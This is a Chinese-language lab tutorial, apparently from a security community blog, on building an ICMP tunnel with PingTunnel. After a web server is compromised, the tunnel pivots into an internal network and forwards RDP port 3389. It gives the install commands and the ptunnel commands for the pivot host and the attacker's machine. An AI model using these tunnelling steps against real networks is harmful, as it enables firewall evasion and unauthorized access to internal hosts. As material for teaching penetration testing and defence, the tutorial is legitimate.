icmp端口_使用icmp隧道进行端口转发

作者:Taoing  编辑:白帽子社区运营团队

    " ICMP隧道简单实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要。

    最常见的ping命令就是利用的ICMP协议,攻击者可以利用命令行得到比回复更多的ICMP请求。在通常情况下,每个ping命令都有相应的回复与请求。

    在一些网络环境中,如果攻击者使用各类上层隧道(例如:HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了,常常会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(防火墙一般不会屏蔽ping的数据包),实现不受限制的访问访问。

    PingTunnel是一款常用的ICMP隧道工具,可以跨平台使用,为了避免隧道被滥用,还可以为隧道设置密码。

"    

573baafcae83a99deece1bceb961b3c9.png

0x01 环境搭建192.168.36.X ‐‐‐‐‐‐ 段模拟公网地址 192.168.118.X ‐‐‐‐‐‐段模拟企业内网地址目前获取到了Web服务器的权限,想用ICMP搭建通往内网的隧道,连接内网Windows的3389端口。准备3台虚拟机:kaliLinux(模拟公网vpn) Ubuntu(模拟企业对外提供Web服务的机器,该机器可以通内网,同时向公网提供服务) 内网Windows(Web服务器可以与该机器连接,该机器开放3389)

0ab7ef0211bf2c3c3f8c4eb2a60ef7f5.pngkali(模拟公网vps):192.168.36.129

49f424dc38b325fd7771908f468abbaf.png

web服务器(Ubuntu,模拟企业公网web服务器,双网卡)公网:192.168.36.130 内网:192.168.118.128

0f0bc8de4fbbdec4887565465e0b987f.png

内网主机(windows):192.168.118.129

590db594c58ba70e64056c8aed045b3d.png

573baafcae83a99deece1bceb961b3c9.png

0x02 开始穿透1)、对kali和WebsSrver安装PingTunnel方法一:简单快速 
apt‐get update apt install ptunnel
方法二:解决方法一不能安装使用 #安装libpcap的依赖环境 
apt‐get install byacc apt‐get install flex bison
#安装libpcap依赖库 
wget http://www.tcpdump.org/release/libpcap‐1.9.0.tar.gz tar ‐xzvf libpcap‐1.9.0.tar.gz cd libpcap‐1.9.0 ./configure make && make install
#安装PingTunnel 
wget http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel‐0.72.tar.gz tar ‐xzvf PingTunnel‐0.72.tar.gz cd PingTunnel make && make install
注:部分出错原因:安装make:
yum ‐y install gcc automake autoconf libtool make

2)、在Webserver上启动pingtunnel 

ptunnel ‐x 654321(‐x为隧道指定连接密码) 

bbd102394a7c1b3c58717b48f1aa62c8.png

3)、kali 连接测试

ptunnel ‐p 192.168.36.130 ‐lp 8888 ‐da 192.168.118.129 ‐dp 3389 ‐x 654321 ‐p 指定ICMP隧道另一端的IP 俗称跳板机 ‐lp:指定本地监听的端口 ‐da:指定要转发的目标机器的IP ‐dp:指定要转发的目标机器的端口 ‐x 之前的隧道密码

98dddc0f1404c06edf94aee131176602.png

4)、成功连接本地windows PC 远程kali 8888端口,即成功连接内网windows3389

e2f4b020cc061918f6867e2198dc605d.png

往期 精彩文章CTF成年之路(一)mysql UDF提权踩坑经验分享内网终结篇-看神器与不出网域擦出火花记一次靶机渗透(vulhub DC2)渗透1a6f72bdc30c518669fbcaddd43737a3.png技术支持:白帽子社区团队 — 扫码关注我们